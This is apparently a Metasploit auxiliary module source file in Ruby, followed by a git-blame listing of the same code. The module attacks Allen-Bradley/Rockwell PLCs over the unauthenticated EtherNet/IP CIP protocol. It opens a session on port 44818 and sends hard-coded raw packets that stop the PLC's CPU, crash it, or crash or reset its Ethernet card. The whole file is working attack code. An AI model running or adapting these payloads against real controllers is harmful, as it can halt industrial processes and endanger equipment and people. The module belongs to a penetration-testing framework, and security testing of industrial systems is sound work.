modules/auxiliary/admin/scada/multi_cip_command.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'English'
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Rex::Socket::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands',
        'Description' => %q{
          The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which
          implements the protocol.  This module implements the CPU STOP command, as well as
          the ability to crash the Ethernet card in an affected device.

          This module is based on the original 'ethernetip-multi.rb' Basecamp module
          from DigitalBond.
        },
        'Author' => [
          'Ruben Santamarta <ruben[at]reversemode.com>',
          'K. Reid Wightman <wightman[at]digitalbond.com>', # original module
          'todb' # Metasploit fixups
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]
        ],
        'DisclosureDate' => '2012-01-19',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(44818),
        # Note that OptEnum is case sensitive
        OptEnum.new('ATTACK', [
          true, 'The attack to use.', 'STOPCPU',
          [
            'STOPCPU',
            'CRASHCPU',
            'CRASHETHER',
            'RESETETHER'
          ]
        ])
      ]
    )
  end

  def run
    attack = datastore['ATTACK']
    print_status "#{rhost}:#{rport} - CIP - Running #{attack} attack."
    sid = req_session
    if sid
      forge_packet(sid, payload(attack))
      print_status "#{rhost}:#{rport} - CIP - #{attack} attack complete."
    end
  end

  def forge_packet(sessionid, payload)
    packet = ''
    packet += "\x6f\x00" # command: Send request/reply data
    packet += [payload.size - 0x10].pack('v') # encap length (2 bytes)
    packet += [sessionid].pack('N') # session identifier (4 bytes)
    packet += payload # payload part
    begin
      sock.put(packet)
    rescue ::Interrupt
      print_error("#{rhost}:#{rport} - CIP - Interrupt during payload")
      raise $ERROR_INFO
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
      print_error("#{rhost}:#{rport} - CIP - Network error during payload")
      return nil
    end
  end

  def req_session
    begin
      connect
      packet = ''
      packet += "\x65\x00" # ENCAP_CMD_REGISTERSESSION (2 bytes)
      packet += "\x04\x00" # encaph_length (2 bytes)
      packet += "\x00\x00\x00\x00" # session identifier (4 bytes)
      packet += "\x00\x00\x00\x00" # status code (4 bytes)
      packet += "\x00\x00\x00\x00\x00\x00\x00\x00" # context information (8 bytes)
      packet += "\x00\x00\x00\x00" # options flags (4 bytes)
      packet += "\x01\x00" # proto (2 bytes)
      packet += "\x00\x00" # flags (2 bytes)
      sock.put(packet)
      response = sock.get_once
      if response
        session_id = begin
          response[4..8].unpack('N')[0]
        rescue StandardError
          nil
        end
        if session_id
          print_status("#{rhost}:#{rport} - CIP - Got session id: 0x" + session_id.to_s(16))
        else
          print_error("#{rhost}:#{rport} - CIP - Got invalid session id, aborting.")
          return nil
        end
      else
        raise ::Rex::ConnectionTimeout
      end
    rescue ::Interrupt
      print_error("#{rhost}:#{rport} - CIP - Interrupt during session negotiation")
      raise $ERROR_INFO
    rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused => e
      print_error("#{rhost}:#{rport} - CIP - Network error during session negotiation: #{e}")
      return nil
    end
    return session_id
  end

  def cleanup
    disconnect
  rescue StandardError
    nil
  end

  def payload(attack)
    case attack
    when 'STOPCPU'
      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # encapsulation -[payload.size-0x10]-
        "\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" + # packet1
        "\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x07\x02\x20\x64\x24\x01" + # packet2
        "\xDE\xAD\xBE\xEF\xCA\xFE\x01\x00\x01\x00"                           # packet3
    when 'CRASHCPU'
      "\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" \
        "\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x0a\x02\x20\x02\x24\x01" \
        "\xf4\xf0\x09\x09\x88\x04\x01\x00\x01\x00"
    when 'CRASHETHER'
      "\x00\x00\x00\x00\x20\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x0c\x00" \
        "\x0e\x03\x20\xf5\x24\x01\x10\x43\x24\x01\x10\x43"
    when 'RESETETHER'
      "\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x08\x00" \
        "\x05\x03\x20\x01\x24\x01\x30\x03"
    else
      print_error("#{rhost}:#{rport} - CIP - Invalid attack option.")
      return nil
    end
  end
end
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`##`

modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`require 'English'`
use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`include Msf::Exploit::Remote::Tcp`
			`include Rex::Socket::Tcp`

modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`def initialize(info = {})`
			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands',`
			`'Description' => %q{`
			`The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which`
			`implements the protocol. This module implements the CPU STOP command, as well as`
			`the ability to crash the Ethernet card in an affected device.`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`This module is based on the original 'ethernetip-multi.rb' Basecamp module`
			`from DigitalBond.`
			`},`
			`'Author' => [`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`'Ruben Santamarta <ruben[at]reversemode.com>',`
			`'K. Reid Wightman <wightman[at]digitalbond.com>', # original module`
			`'todb' # Metasploit fixups`
			`],`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`'License' => MSF_LICENSE,`
			`'References' => [`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`[ 'URL', 'http://www.digitalbond.com/tools/basecamp/metasploit-modules/' ]`
			`],`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`'DisclosureDate' => '2012-01-19',`
			`'Notes' => {`
			`'Stability' => [CRASH_SERVICE_DOWN],`
			`'SideEffects' => [IOC_IN_LOGS],`
			`'Reliability' => []`
			`}`
			`)`
			`)`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00
			`register_options(`
			`[`
			`Opt::RPORT(44818),`
			`# Note that OptEnum is case sensitive`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`OptEnum.new('ATTACK', [`
			`true, 'The attack to use.', 'STOPCPU',`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`[`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`'STOPCPU',`
			`'CRASHCPU',`
			`'CRASHETHER',`
			`'RESETETHER'`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`]`
			`])`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`]`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`)`
			`end`

			`def run`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`attack = datastore['ATTACK']`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`print_status "#{rhost}:#{rport} - CIP - Running #{attack} attack."`
			`sid = req_session`
			`if sid`
			`forge_packet(sid, payload(attack))`
			`print_status "#{rhost}:#{rport} - CIP - #{attack} attack complete."`
			`end`
			`end`

			`def forge_packet(sessionid, payload)`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`packet = ''`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`packet += "\x6f\x00" # command: Send request/reply data`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`packet += [payload.size - 0x10].pack('v') # encap length (2 bytes)`
			`packet += [sessionid].pack('N') # session identifier (4 bytes)`
			`packet += payload # payload part`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`begin`
			`sock.put(packet)`
			`rescue ::Interrupt`
			`print_error("#{rhost}:#{rport} - CIP - Interrupt during payload")`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`raise $ERROR_INFO`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused`
			`print_error("#{rhost}:#{rport} - CIP - Network error during payload")`
			`return nil`
			`end`
			`end`

			`def req_session`
			`begin`
			`connect`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`packet = ''`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`packet += "\x65\x00" # ENCAP_CMD_REGISTERSESSION (2 bytes)`
			`packet += "\x04\x00" # encaph_length (2 bytes)`
			`packet += "\x00\x00\x00\x00" # session identifier (4 bytes)`
			`packet += "\x00\x00\x00\x00" # status code (4 bytes)`
			`packet += "\x00\x00\x00\x00\x00\x00\x00\x00" # context information (8 bytes)`
			`packet += "\x00\x00\x00\x00" # options flags (4 bytes)`
			`packet += "\x01\x00" # proto (2 bytes)`
			`packet += "\x00\x00" # flags (2 bytes)`
			`sock.put(packet)`
			`response = sock.get_once`
			`if response`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`session_id = begin`
			`response[4..8].unpack('N')[0]`
			`rescue StandardError`
			`nil`
			`end`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`if session_id`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`print_status("#{rhost}:#{rport} - CIP - Got session id: 0x" + session_id.to_s(16))`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`else`
			`print_error("#{rhost}:#{rport} - CIP - Got invalid session id, aborting.")`
			`return nil`
			`end`
			`else`
			`raise ::Rex::ConnectionTimeout`
			`end`
			`rescue ::Interrupt`
fix spelling in aux modules 2024-01-07 15:02:53 -05:00			`print_error("#{rhost}:#{rport} - CIP - Interrupt during session negotiation")`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`raise $ERROR_INFO`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused => e`
			`print_error("#{rhost}:#{rport} - CIP - Network error during session negotiation: #{e}")`
			`return nil`
			`end`
			`return session_id`
			`end`

			`def cleanup`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`disconnect`
			`rescue StandardError`
			`nil`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`end`

			`def payload(attack)`
			`case attack`
modules/auxiliary/admin/scada: Resolve RuboCop violations 2025-05-26 20:49:19 +10:00			`when 'STOPCPU'`
			`"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # encapsulation -[payload.size-0x10]-`
			`"\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" + # packet1`
			`"\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x07\x02\x20\x64\x24\x01" + # packet2`
			`"\xDE\xAD\xBE\xEF\xCA\xFE\x01\x00\x01\x00" # packet3`
			`when 'CRASHCPU'`
			`"\x00\x00\x00\x00\x02\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x1a\x00" \`
			`"\x52\x02\x20\x06\x24\x01\x03\xf0\x0c\x00\x0a\x02\x20\x02\x24\x01" \`
			`"\xf4\xf0\x09\x09\x88\x04\x01\x00\x01\x00"`
			`when 'CRASHETHER'`
			`"\x00\x00\x00\x00\x20\x00\x02\x00\x00\x00\x00\x00\xb2\x00\x0c\x00" \`
			`"\x0e\x03\x20\xf5\x24\x01\x10\x43\x24\x01\x10\x43"`
			`when 'RESETETHER'`
			`"\x00\x00\x00\x00\x00\x04\x02\x00\x00\x00\x00\x00\xb2\x00\x08\x00" \`
			`"\x05\x03\x20\x01\x24\x01\x30\x03"`
Adding DigitalBond SCADA modules 2012-04-05 12:35:21 -05:00			`else`
			`print_error("#{rhost}:#{rport} - CIP - Invalid attack option.")`
			`return nil`
			`end`
			`end`
			`end`